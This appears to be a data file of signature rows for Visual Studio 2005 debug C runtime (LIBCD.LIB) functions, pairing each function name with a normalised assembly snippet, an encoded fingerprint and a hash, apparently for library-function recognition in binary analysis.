+__beep,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nPOP EBP",klJWkQAAAAAAAAAA,[],ff47cd23b47c9e23ddead526a26d87490b24ec98,VS2005,LIBCD.LIB
+__sleep,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",cMiU5PP1Jpvoyg0m6MoNJgAAAAAAAAAA8/UmmwAAAAAAAAAA,[],e2a12f76c060817ae48d2e704c6876c23b390648,VS2005,LIBCD.LIB
+__mbsnset,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0\nCMP DWORD PTR DS:[0],0\nJCC CONST",cvRkuyJMqqechlE44dkFeZyGUTichlE4lkpNJH0JSDSFlJTPnIZROJZz8F933LbYd9y22JZz8F/0Ke4InIZROJZz8F933LbYhZSUz4hCHwwAAAAAd9y22JZz8F/0Ke4I9CnuCOnuTmkAAAAAiEIfDF6jgycUklJBlnPwX+nuTmkAAAAA6e5OaX0JSDQAAAAA9CnuCOnuTmkAAAAAFJJSQV6jgyechlE4lnPwX+nuTmkAAAAAdmTemE+LzAoAAAAA6e5OaTUWchMAAAAAnIZROJZz8F933LbYnIZROEFF0Bvh2QV5kLCdBpZKTSR2ZN6Yd9y22JZz8F/0Ke4I4dkFeUFF0Bvu+9p07vvadEFF0BsAAAAAIkyqpzUWchMAAAAAQUXQG0+LzAoAAAAANRZyE4hCHwwAAAAAT4vMCgAAAAAAAAAA9CnuCHL0ZLsAAAAAXqODJ5yGUTgAAAAAfQlINJyGUTjh2QV5lnPwX3L0ZLsAAAAA,[],c891616955d897fc0aa82c0afe30a57805a30c86,VS2005,LIBCD.LIB
+_strxfrm,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],CONST\nCMP DWORD PTR DS:[CONST],0\nJCC CONST",wMu5wE+LzAoAAAAAcv8ZO+enX9ckA8Od56df1wEG3s5eo4MnGJdxO0FF0BsAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAXqODJ0FF0BsAAAAAAQbezhiXcTteo4MnXqODJ0FF0BsAAAAAJAPDneenX9fAy7nA,[],72d640222b211013bb4a2ae587cbdc4163eddc2c,VS2005,LIBCD.LIB
+__mbsicmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,R32\nSETLE R8\nDEC R32",JAZdUshSX9cAAAAA4dkFebTmUQvjyoV0yJ7an0+LzAoAAAAA/MSgqk+LzAoAAAAA/MSgqk+LzAoAAAAAyFJf17k2qHwAAAAA4dkFebTmUQvjyoV02wdx7zUWchMNzMAByFJf1ztP3EkAAAAAXqODJ7k2qHwAAAAA7RcDyZ1t798j1+Ch48qFdF6jgycAAAAAXqODJztP3EkAAAAADczAAU+LzAoAAAAA7RcDyRmPK6sj1+ChNRZyEztP3EkAAAAAtOZRC5yGUTgi2iaCT4vMCgAAAAAAAAAAtOZRC5yGUTgi2iaC48qFdF6jgycAAAAAI9fgodQjZA4AAAAAI9fgoSIXkRgAAAAAEIVrfztP3EkrieMfnW3v39sHce/IntqfGY8rq+0XA8nh2QV5K4njH0+LzAoAAAAA1CNkDtsHce/IntqfnIZROPzEoKokBl1SItomgshSX9cAAAAAIheRGO0XA8nh2QV5uTaofNsHce/IntqfItomgshSX9cAAAAAO0/cSe0XA8nh2QV5nIZROPzEoKokBl1SO0/cSe0XA8nh2QV5JAZdUshSX9cAAAAA,[],2a82f151a9ab3fbbc5649db70499facc4eb90b32,VS2005,LIBCD.LIB
+__strnset,"INC R32\nSUB R32,R32\nMOV R32,R32\nMOV R32,R32\nMOV R8,BYTE PTR SS:[EBP+CONST]\nREP STOS BYTE PTR ES:[R32]\nMOV R32,R32\nPOP R32",Gpi1sAAAAAAAAAAAaR8EGAAAAAAAAAAAUagaLMjPaIq6bUIPyM9oigAAAAAAAAAAum1CDxqYtbBpHwQY,[],6de495c028a3619394d9ea76a9bafd088689fd2e,VS2005,LIBCD.LIB
+__wstrtime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",YWusxQAAAAAAAAAA,[],cd70b5126a43c16aed2b400296e95989db54a3fb,VS2005,LIBCD.LIB
+__heapwalk,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",stSy4wAAAAAAAAAAgOYcvAAAAAAAAAAA/MSgqoDmHLwAAAAAnIZROJdxUZ6nQAjbgst3LfQp7ggixfQ3kuJB0/Qp7ggixfQ36eey+DUWchMC6H/0l3FRnoDmHLwAAAAAnIZROEIiA0uXcVGep0AI24DmHLwAAAAAAuh/9PzEoKq7R6qel3FRnoDmHLwAAAAAQiIDS6eI0oc1FnITu0eqnoDmHLwAAAAAIsX0N5yGUTgAAAAANRZyE0IiA0sAAAAA9CnuCJyGUTgAAAAANRZyE5LiQdMAAAAAp4jSh5az+h2olG2zlrP6HQAAAAAAAAAA2gvXbSnZq7Dp57L4/MSgqoDmHLwAAAAAnIZROJyGUTiXrVUMKdmrsJLiQdPz610Wl61VDJyGUTj8xKCqqJRts7LUsuMAAAAA8+tdFoLLdy38xKCq/MSgqoDmHLwAAAAA,[],e60382826f4c5567d775dc92fc3844fe27a5266a,VS2005,LIBCD.LIB
+__heap_abort,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",p08ongAAAAAAAAAA,cGUAYwAAAAAAAAAAH/nyOwAAAAAAAAAAOWijNHBlAGMf+fI7,8cbff268db08293684533e50877ad39696ad3be6,VS2005,LIBCD.LIB
+___crtCompareStringA,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",nIZROJyGUTj8xKCqZnkxNTEuOrEAAAAA3iSCKSQDw5068AAFOvAABdFIlKUkPsFM/MSgqjEuOrEAAAAA/MSgqjEuOrEAAAAAZJveYeHZBXkAAAAAQpE1tugXBRdmeTE1sUYUnfzEoKoP0VPtZnkxNTEuOrEAAAAAlwBOkJcATpAZpmb/ZJveYeHZBXkAAAAAsUYUnfzEoKoP0VPtnIZROL5X1Nj8xKCq6BcFF5yGUTgAAAAAJAPDndFIlKUkPsFM4dkFefzEoKoP0VPtMS46sQAAAAAAAAAADczAATEuOrEAAAAA4dkFefzEoKoP0VPtvlfU2JyGUThmeTE1D9FT7fzEoKr4TfwqZnkxNTEuOrEAAAAAZnkxNTEuOrEAAAAAD9FT7fzEoKr4TfwqdYMGr5yGUTichlE4ac0GAEKRNbaDrkNe+E38Kl6jgycWRaq+6BcFF5yGUTgAAAAAnIZROGrKzxYNzMABlwBOkGZ5MTUZpmb/+E38Kl6jgycWRaq+GaZm/5yGUTgAAAAAnIZROJyGUTichlE4LaOCjZyGUTiXAE6Q3XDeW4OuQ15pzQYAnIZROORSvJ+chlE45EM5vgAAAAAAAAAAFkWqvl6jgyf8xKCq0UiUpeRDOb6chlE4nIZRONvqEhSchlE4T4sweDEuOrEAAAAAFkWqvl6jgyf8xKCqnIZROORSvJ/b6hIUnIZROJyGUTjdcN5b2+oSFORSvJ91gwavnIZROGrKzxZmeTE1XqODJ7FGFJ0AAAAADczAATEuOrEAAAAAZnkxNTEuOrEAAAAA/MSgqjEuOrEAAAAAZnkxNTEuOrEAAAAAnIZROIOuQ15pzQYA/MSgqjEuOrEAAAAAasrPFkKRNbZmeTE1nIZROJyGUTjeJIIpXqODJ7FGFJ0AAAAAJD7BTDEuOrEAAAAA/MSgqjEuOrEAAAAA/MSgqjEuOrEAAAAAQpE1tugXBRdmeTE1GaZm/5yGUTgAAAAAg65DXpyGUTj8xKCqnIZROEKRNbachlE45FK8n5yGUTichlE4/MSgqjEuOrEAAAAA/MSgqjEuOrEAAAAAnIZROGSb3mH8xKCqnIZROJyGUTichlE4nIZROGSb3mH8xKCqasrPFk+LMHgNzMABnIZROCQDw5068AAF/MSgqjEuOrEAAAAA,[],98a3e8f797e924e230669c0d2dbef1d15be44061,VS2005,LIBCD.LIB
+__wchdir,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nMOV ESP,EBP\nPOP EBP\nRETN",DczAAU+LzAoAAAAAKr7stPaiguIrXHiptjCcBPaiguIqvuy09qKC4gAAAAAAAAAAojx2QL6YTNuh+G3fT4vMCgAAAAAAAAAADczAAU+LzAoAAAAAofht376YTNsNzMABK1x4qaH4bd+iPHZAvphM2/aiguINzMAB,[],d9a09fbc36ed510a0ee101946c99a118850f65bd,VS2005,LIBCD.LIB
+_wcstod,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R16,WORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",XqODJ3Uk9rMAAAAAvDjyKj7KhtkAAAAA8WS7zl6jgycAAAAA1RU3LAAAAAAAAAAAXqODJ9UVNywAAAAA2wdx71JnfwbofidMgRyCzvFCfGQAAAAA6H4nTPYTgIsVpbdvPsqG2fFCfGQAAAAAFaW3bxmmZv8AAAAA1C63n7w48ipeo4Mn9hOAi9UVNywAAAAAyFJf14IdleQAAAAAGaZm/9UVNywAAAAARW3fYTOYxwkAAAAA8UJ8ZHUk9rPULrefdST2szOYxwlFbd9hUmd/BnO+UlFmPyH9M5jHCdsHce9f81sSZj8h/dUVNywAAAAAVeDb8oEcgs7IUl/XX/NbEl6jgyfxZLvOgh2V5IEcgs7IUl/Xc75SUdUVNywAAAAA,[],cce370945fe37b4679edb4915af4f6f17028c5b5,VS2005,LIBCD.LIB
+_memmove,"SHR CONST,CONST\nAND CONST2,CONST\nCMP R32,CONST\nJCC CONST",h6NtfSOW2RpY2ig6G1tgnQAAAAAAAAAAhuPK6Eg0I7sI/nZxCP52cQAAAAAAAAAArLCxdVjaKDqHo219SDQjuwAAAAAAAAAAI5bZGobjyugvGjTcCP52cQAAAAAAAAAALxo03Eg0I7uvEG0QLxo03BtbYJ0Os0F3huPK6Eg0I7sI/nZxWNooOobjyugvGjTcDrNBdwAAAAAAAAAArxBtEAAAAAAAAAAASDQjuwAAAAAAAAAASDQjuwAAAAAAAAAA,[],0c78b090c42b41060d0e37019302528728b730bd,VS2005,LIBCD.LIB
+__mbslen,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",chMCgPQp7gj+Ikd8d9y22F6jgyexRhSdgudAo+HZBXkAAAAAXqODJ0FF0BsAAAAAXqODJ4LnQKMAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAA/iJHfE+LzAoAAAAA4dkFeUFF0Bt33LbYsUYUnV6jgydeo4Mn9CnuCOHZBXkAAAAA,[],c9209c4afbf08df21e7ccd2f772ab54e3e32b06b,VS2005,LIBCD.LIB
+__stricmp,"SUB R8,CONST\nCMP R8,CONST\nSBB R8,R8\nAND R8,CONST\nADD R8,R8\nADD R8,CONST\nXCHG R8,R8\nSUB R8,CONST",JPTvpEL41tYAAAAA2M0EpiT076R8o2ems7YsDNjNBKYAAAAArfh6LdjNBKZL07Vp36ScoNjNBKYAAAAAS9O1aST076QAAAAA2M0EpkL41tZ8o2emOtMlcLO2LAzfpJygd8zaekL41tYAAAAAfKNnptjNBKat+HotQvjW1gAAAAAAAAAAfKNnptjNBKYoEhMnKBITJ9jNBKZ3zNp6,[],e9e765534c9af1cf5f477b12e6bfbe0fb3257f81,VS2005,LIBCD.LIB
+__strcmpi,"SUB R8,CONST\nCMP R8,CONST\nSBB R8,R8\nAND R8,CONST\nADD R8,R8\nADD R8,CONST\nXCHG R8,R8\nSUB R8,CONST",2M0EpkL41tZ8o2em2M0EpiT076R8o2emfKNnptjNBKat+HotfKNnptjNBKYoEhMnd8zaekL41tYAAAAAQvjW1gAAAAAAAAAAKBITJ9jNBKZ3zNp6S9O1aST076QAAAAAJPTvpEL41tYAAAAArfh6LdjNBKZL07Vps7YsDNjNBKYAAAAAOtMlcLO2LAzfpJyg36ScoNjNBKYAAAAA,[],e9e765534c9af1cf5f477b12e6bfbe0fb3257f81,VS2005,LIBCD.LIB
+__ftelli64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",bUkFBl6jgyc+yobZkvTRAeRSvJ87j6vlPsqG2UqIAMsAAAAAbRuS6l6jgyc+yobZPsqG2V6jgycAAAAAPsqG2V6jgycAAAAAXqODJz7KhtkAAAAAXqODJz7KhtkAAAAAbRuS6kGNfBtKPqbhPsqG2Rl1qqkAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTiMLwcO4y8nvm0bkupakB6JjC8HDgMEQP5o50nZGXWqqXk8gdgAAAAAXqODJxl1qqkAAAAAr2ou8Vad8TiDrkNeVp3xOE0oA0kx6QSgaOdJ2QMEQP4AAAAA73ClmcSg0gkAAAAAQY18G8SiU5g6xLKOeTyB2MSg0gkAAAAAWpAeiV6jgye8OPIqvDjyKkqIAMsAAAAAOsSyjsSg0gkAAAAAAwRA/m0bkuohh3ljxKDSCQAAAAAAAAAAXqODJ0GNfBsAAAAAxKJTmHk8gdgp2auwMekEoE0oA0ltG5LqU4hC7oOuQ14AAAAAbRuS6k0oA0n0Ke4IKdmrsDcD3fKfnB88g65DXlad8ThTiELuPsqG2V6jgycAAAAAIYd5Y7yCQbCchlE4nIZROG0bkuq8gkGwn5wfPHk8gdgAAAAASj6m4cSg0gkAAAAA9CnuCAZiiMMAAAAAvIJBsMSg0gkAAAAAPsqG2YOuQ14AAAAAma5ZK5yGUTgAAAAASogAy16jgydtSQUGNwPd8hl1qqmvai7xTSgDSQZiiMMAAAAAg65DXm0bkuptSQUGbRuS6uMvJ77vcKWZnIZROORSvJ+S9NEBbUkFBl6jgyc+yobZBmKIwxl1qqk+yobZ,[],b77b7c49078f488e71f336ac1293467ccb7aa8e1,VS2005,LIBCD.LIB
+__mbsicoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB CONST,CONST\nMOV ESP,EBP\nPOP EBP\nRETN",T4vMCgAAAAAAAAAAi7I25QAAAAAAAAAAl3FRnk+LzAoAAAAA02k2AouyNuWXcVGe,[],93bd35a9abf33ed51aeff3accfa91aebffb926de,VS2005,LIBCD.LIB
+__mbsncmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,R32\nSETLE R8\nDEC R32",T4vMCgAAAAAAAAAA9CnuCPMRN8sAAAAA0eac0/MRN8sAAAAA4dkFedHmnNP0Ke4IVaatKCQDw51meTE19CnuCPMRN8sAAAAA0eac0/MRN8sAAAAAZnkxNU+LzAoAAAAA8xE3y7k2qHwAAAAAJAPDnYhCHwx2ZN6YuTaofNsHce/IntqfdmTemE+LzAoAAAAA8xE3y84Ei3EAAAAAyJ7an0+LzAoAAAAAzgSLcbk2qHzh2QV5iEIfDCbu4WXOBItxzgSLcc4Ei3Hh2QV52wdx7zUWchMNzMABDczAAU+LzAoAAAAA4dkFedHmnNP0Ke4INRZyE4hCHwwAAAAAJu7hZU+LzAoAAAAA,[],a6577b8891cd1358ff9249c8c776ed3fb6f88c68,VS2005,LIBCD.LIB
+__execlp,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32\nPOP R32",O4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vlnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTikF2NvkvTRAeRSvJ87j6vlO4+r5eRSvJ8AAAAApBdjb+RSvJ+S9NEBkvTRAeRSvJ87j6vlSS3x9wAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vl5FK8n6QXY29JLfH3nIZROORSvJ+S9NEBrKbWTpyGUTgAAAAA,[],6a4cc664566e6e51177f08acb17223afe963bc82,VS2005,LIBCD.LIB
+_getenv,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",ICCqPk+LzAoAAAAAgsU5lchSX9cC1M6Jl+CQsYOuQ14AAAAAnIZROCbu4WWX4JCxJm0Xn8hSX9cgIKo+nIZROJyGUTgkA8OdyFJf14OuQ14AAAAAZnkxNU+LzAoAAAAAZnkxNU+LzAoAAAAAUmjqW91w3ltmeTE1AtTOichSX9cmbRef3XDeWybu4WWchlE4pQsjJJyGUThmeTE1Ju7hZU+LzAoAAAAAg65DXibu4WWCxTmVT4vMCgAAAAAAAAAAJAPDnZyGUThSaOpbnIZROCbu4WWchlE4,[],20dbb1693958d7336f0ff908baa01862fc9f4136,VS2005,LIBCD.LIB
+__allmul,"PUSH R32\nMUL R32\nMOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL DWORD PTR SS:[ESP+CONST]\nADD R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMUL R32",lO+zQK27ITBd7RnUrbshMAAAAAAAAAAAXe0Z1AAAAAAAAAAA,[],9fcbc10ac0e186150c3bdef2215147fc39332cc2,VS2005,LIBCD.LIB
+__chkstk,"SUB R32,R32\nMOV R32,ESP\nTEST DWORD PTR DS:[R32],R32\nMOV ESP,R32\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nRETN",VWkLBm7Gi7w5BOQdOQTkHTkE5B1uxou8bsaLvAAAAAAAAAAA,[],3938e68dc25ffe40c53385c590306600a762caf1,VS2005,LIBCD.LIB
+__alloca_probe,"SUB R32,R32\nMOV R32,ESP\nTEST DWORD PTR DS:[R32],R32\nMOV ESP,R32\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nRETN",VWkLBm7Gi7w5BOQdbsaLvAAAAAAAAAAAOQTkHTkE5B1uxou8,[],3938e68dc25ffe40c53385c590306600a762caf1,VS2005,LIBCD.LIB
+_wcsstr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nSUB R32,R32\nTEST R32,R32",ISBBJSbu4WXuhqRhISBBJSEgQSVNyWNNoDc6oU+LzAoAAAAAXp36xCEgQSUAAAAAJu7hZU+LzAoAAAAAyFJf1yEgQSUAAAAA7oakYSEgQSUAAAAATcljTSEgQSVenfrEMVcF0SEgQSUAAAAAISBBJSEgQSUhIEElT4vMCgAAAAAAAAAAISBBJchSX9egNzqh,[],6bc1a91580c451efcd015217b9e42de7c290c5bc,VS2005,LIBCD.LIB
+_fread,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],-1\nJCC CONST",NRZyE2nNBgAAAAAAz8bsr0FF0BttG5LqQUXQG0+LzAoAAAAAac0GAEFF0BttG5Lqd9E8KU+LzAoAAAAAuktfOpyGUTgcZM0dbRuS6nblFGYp2auwduUUZk+rzBychlE4nIZROF0WRVxN01UtBzUM2TUWchMAAAAATdNVLbpLXzoAAAAA7HaGuyDrNEJxWpQ6nIZROAc1DNl30TwpcVqUOv5AVDwAAAAAXRZFXJyGUTgcZM0dT6vMHEOtAwpmKZRylKNS920bkupmeTE1IOs0QjUWchMAAAAAT4vMCgAAAAAAAAAA/kBUPDUWchMAAAAAZimUck+LzAoAAAAAKdmrsHblFGbsdoa7Q60DCmnNBgAAAAAAZnkxNU+LzAoAAAAAbRuS6s/G7K+8OPIqHGTNHU+LzAoAAAAAvDjyKmnNBgAAAAAA,[],7d1f09a67f8a40159328116c2cc2b611e8a491b7,VS2005,LIBCD.LIB
+__getdiskfree,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",nIZROFgXk/uXcVGel3FRnk+LzAoAAAAAMc2O9ybu4WWVUBzMVaatKJyGUTj0Ke4IWBeT+ybu4WWVUBzMlVAczE+LzAoAAAAA9CnuCDHNjvcAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAA,[],276af4acd0fb2d0a6e6ac14f3455bf018bec4444,VS2005,LIBCD.LIB
+__wincmdln,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",chMCgG9bb4brj73AR2glql6jgycAAAAAKIdjEF6jgyc+yobZeBhy9CiHYxDh2QV5yFJf1yiHYxAAAAAAyFJf1+HZBXkAAAAA64+9wCiHYxB4GHL0PsqG2V6jgycAAAAAb1tvhiiHYxB4GHL04dkFedUc1LYoh2MQ1RzUtgAAAAAAAAAAXqODJ3gYcvQAAAAAXqODJ+HZBXkAAAAA4dkFeSiHYxBHaCWqKIdjEOHZBXnIUl/XKIdjENUc1LbIUl/X,[],05529e3f51007ca25726c9b130d03a8c988db3a9,VS2005,LIBCD.LIB
+_strlen,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",NELWFQAAAAAAAAAANSlAMjUpQDKEcIcd6FWr2jRC1hVeo4MnXKU5iTRC1hVY2ig6XqODJzUpQDIAAAAANELWFQAAAAAAAAAANELWFQAAAAAAAAAAhHCHHTRC1hXYzQSmWNooOlylOYkqs0LeKrNC3jUpQDIAAAAANELWFQAAAAAAAAAA2M0EpjRC1hXoVavaPAoaXTUpQDJcpTmJ6FWr2jRC1hXoVava,[],b06844b81a2ffd75ac7b0ee991d254eed08a75df,VS2005,LIBCD.LIB
+___STRINGTOLD,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",SvKl7tUc1LYlRTTkJUU05NUc1LYAAAAA1RzUtgAAAAAAAAAA,[],a384487396c7550490a660b7df5e7400e96245fa,VS2005,LIBCD.LIB
+___strgtold12,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",bUkFBmnNBgBeo4MntB/fNhdP+qit/Rq5EpvqFJ4VSNPIUl/Xac0GAJyGUTichlE4XqODJ9Paeh8AAAAAac0GANGyrb2bQQeTnIZROGnNBgB7qn/hnIZROGKoXH4sk5c/e6p/4d/cdGYSm+oUrf0auRdP+qgAAAAALJOXP2KoXH4AAAAAXqODJ5yGUTgAAAAAnhVI05yGUTgAAAAAF0/6qJyGUThNKANJ39x0Zp4VSNPIUl/XTSgDSZyGUTgAAAAAac0GAJyGUThpzQYAtqCaPQAAAAAAAAAAnIZROIsNFExNKANJnIZROJyGUTjegR2vTSgDSYsNFEwAAAAAYqhcfgAAAAAAAAAA3oEdr2KoXH4AAAAAOsWmFF6jgycAAAAAiw0UTIsNFEz0Ke4IyFJf16QXY28AAAAAac0GAJ4VSNPIUl/X9CnuCF6jgycAAAAAm0EHkzUWchO2oJo909p6H16jgydtSQUGGoQcdrQf3zZenfrEiw0UTDrFphT0Ke4IbUkFBl6jgydtSQUGpBdjb7Qf3zZenfrE9CnuCF6jgycAAAAAwJexuG1JBQYAAAAANRZyE2nNBgAAAAAAbUkFBl6jgydtSQUGnIZROJyGUThQ25n2Xp36xBqEHHYAAAAA0bKtvZyGUThpzQYAUNuZ9mKoXH4AAAAAbUkFBl6jgydtSQUG,[],c688f38e83e91e02b1efb8a89a81f32baf173c98,VS2005,LIBCD.LIB
+__futime,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",Hhi6OU+LzAoAAAAAT6vMHCKmk3geGLo5da1LDU+LzAoAAAAAT4vMCgAAAAAAAAAA2MX2RE+rzBweGLo5IqaTeB4YujnYxfZE2MX2REUbpi91rUsNIqaTeHWtSw3YxfZERRumLybu4WV1rUsNda1LDU+LzAoAAAAAHhi6OU+LzAoAAAAAVaatKMsIrOQ8ZELyHhi6OU+LzAoAAAAAJu7hZU+LzAoAAAAAywis5CKmk3geGLo5PGRC8iKmk3geGLo5,[],d219291704208f3b6a2f7e73175f281df1a2ccf8,VS2005,LIBCD.LIB
+__utime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",T4vMCgAAAAAAAAAAWHP5zmMfuoPEkqZoYx+6g0+LzAoAAAAAxJKmaE+LzAoAAAAA,[],7343d4f4b58e8364a0c3ad5934c105dd875b3305,VS2005,LIBCD.LIB
+_wcspbrk,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nCMP R32,R32\nJCC CONST",6W5mbV6jgyegNzqhoDc6oU+LzAoAAAAAcVqUOiEgQSUAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAPsqG2SEgQSUAAAAALtQI0iEgQSUAAAAAISBBJchSX9fpbmZtISBBJSbu4WVxWpQ6XqODJz7KhtkAAAAAyFJf1yEgQSUAAAAA,[],64b2c5a1a3a6d4d358380b7d8f84406286cbb873,VS2005,LIBCD.LIB
+__wcsupr,"PUSH CONST\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nPUSH R32\nCALL CONST\nADD ESP,CONST",XqODJ7beaw0AAAAAQxjgylsnTNxeo4MncVqUOiEgQSUAAAAAWydM3I2pT+peo4Mn6H4nTF6jgyfphTBlXqODJ7beaw0AAAAAjalP6rbeaw0AAAAAT4vMCgAAAAAAAAAA6H4nTF6jgyfofidMPsqG2SEgQSUAAAAAy4LLlU+LzAoAAAAAISBBJcuCy5XofidMxDZaZ0MY4Mpeo4MnXqODJz7KhtkAAAAAXqODJ7beaw0AAAAAcv8ZO8Q2WmdxWpQ66YUwZV6jgycAAAAAtt5rDU+LzAoAAAAA,[],255b554c62bdabeb86cea21449ec2a4215466b6e,VS2005,LIBCD.LIB
+__twoToTOS,"FLD ST\nFRNDINT\nFSUBR ST(1),ST\nFXCH ST(1)\nFCHS\nF2XM1\nFLD1\nFADDP ST(1),ST",HuprcAAAAAAAAAAA,[],c90d3338d489c33af611318ce3484d5894ed0525,VS2005,LIBCD.LIB
+__math_exit,"WAIT\nFSTSW R16\nAND R16,CONST\nJCC CONST",6jKEuNWbAf8Q218zENtfM9WbAf+YWerZmFnq2QAAAAAAAAAAFrN0wgDh1mvqMoS41ZsB/wAAAAAAAAAAAOHWawAAAAAAAAAA,[],e87f07714b85f55d74e6738793f4bb88bc0c9519,VS2005,LIBCD.LIB
+__convertTOStoQNaN,"FADD QWORD PTR DS:[0]\nMOV R32,CONST\nRETN",yHOnCgAAAAAAAAAA6FWr2kL/d2nIc6cKQv93aQAAAAAAAAAA,[],62b15a8194d1e576cf681a5c3e5e947b40d0546e,VS2005,LIBCD.LIB
